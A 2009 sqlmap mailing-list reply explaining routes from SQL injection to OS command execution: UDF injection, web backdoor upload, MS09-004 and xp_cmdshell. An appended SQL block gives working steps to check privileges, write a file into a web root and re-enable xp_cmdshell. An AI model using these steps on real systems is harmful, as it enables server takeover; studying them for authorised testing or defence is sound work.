Re: [sqlmap-users] post exploitation
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-22 12:02:14
Hi Wullie,

On Mon, Dec 21, 2009 at 23:30, wullie millen <wul...@go...> wrote:
> ...
> First off I just want to say thanks for such a great tool and really
> appreciate all the hard work that you put into the project.

Thanks.

> Whenever I use this to exploit a system, I usually get user names and
> passwords and all kinds of other things which can come in handy. What I
> would really like to know is how to get command execution on a server
> that does not support batched queries? Please forgive me for being a
> noob to webapp security, but in MySQL I know there are the UDFs you have
> created, but what are the present requirements to use these? I have had
> read and write access but still no shell, and have even been DBA on an
> MSSQL system but still no shell. Are these limitations of the tool or
> could this be something to do with the paths I'm asked for? Also, is
> there any way I can get command execution on a system with only read
> access? I have heard this is possible via log poisoning; does anyone
> have any pointers on this?

UDF injection to command execution can be achieved when the database user has high privileges on PostgreSQL and the FILE privilege on MySQL. Also, it is required that the front-end web application supports batched queries (all do for PostgreSQL, ASP.NET does for MySQL).

When this requirement is not in place there are still ways to execute commands, like uploading a web backdoor within a writable folder in the web server document root (this is implemented for MySQL running on PHP/ASP in sqlmap, a bit buggy though), and it still requires the database user to have the FILE privilege.

On Microsoft SQL Server you need to escalate privileges (via OPENROWSET on MSSQL 7.0 and 2000), exploit a buffer overflow (MS09-004, it does not require ANY privilege for the database user, sqlmap can do it) or abuse the xp_cmdshell stored procedure (requires high privileges and is usually disabled on MSSQL 2005/2008, but can be easily re-enabled/created if you have DBA privileges).
An in-depth walk-through of these and other techniques can be found at the following links:

* http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
* http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides
* http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database

Cheers,
-- 
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
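The prerequisite checks behind the reply above (FILE privilege and a writable document root on MySQL, sysadmin and a re-enabled xp_cmdshell on MSSQL 2005/2008), as an added example that is not part of the original message and not sqlmap's own code. The document root path, the file name and the assumption that the statements reach the server through a stacked-query injection (appended after a `;`) are assumptions made for illustration.

```sql
-- Added example, not from the original thread or from sqlmap.
-- Paths and file names are assumptions.

-- ===== MySQL: UDF injection and backdoor upload both need FILE =====

-- Who is the application connecting as, and does that account hold
-- FILE? FILE is a global privilege, so look for it in an "ON *.*" grant.
SELECT CURRENT_USER();
SHOW GRANTS FOR CURRENT_USER();

-- Same check against information_schema, easier to read in a blind
-- injection where only one column comes back at a time.
SELECT grantee, privilege_type
  FROM information_schema.user_privileges
 WHERE privilege_type IN ('FILE', 'SUPER');

-- Caveat the message does not mention: on MySQL builds that have
-- secure_file_priv, a non-empty value confines INTO OUTFILE and
-- LOAD_FILE() to that directory, so FILE alone is not enough to reach
-- the web server's document root.
SELECT @@secure_file_priv;

-- Writability test for the assumed document root before attempting a
-- backdoor. MySQL refuses to overwrite an existing file, so a fresh
-- name is used; a web request for /wtest.txt confirms the path maps to
-- the document root.
SELECT 'write-test' INTO OUTFILE '/var/www/html/wtest.txt';

-- ===== Microsoft SQL Server: xp_cmdshell needs sysadmin =====

-- Returns 1 when the current login is a member of the sysadmin server
-- role, which is what "DBA privileges" means here.
SELECT IS_SRVROLEMEMBER('sysadmin');

-- On 2005/2008 xp_cmdshell ships disabled; a sysadmin can re-enable it
-- through sp_configure. In a stacked-query injection each statement is
-- appended after a ';'.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Confirm the change took: config_value and run_value should both be 1.
EXEC sp_configure 'xp_cmdshell';

-- Harmless command to prove OS-level execution and learn which account
-- the SQL Server service runs as.
EXEC master..xp_cmdshell 'whoami';
```

If `IS_SRVROLEMEMBER('sysadmin')` returns 0, the sp_configure calls fail with a permissions error and the other two routes in the reply (OPENROWSET privilege escalation on 7.0/2000, or MS09-004) are the ones left to consider.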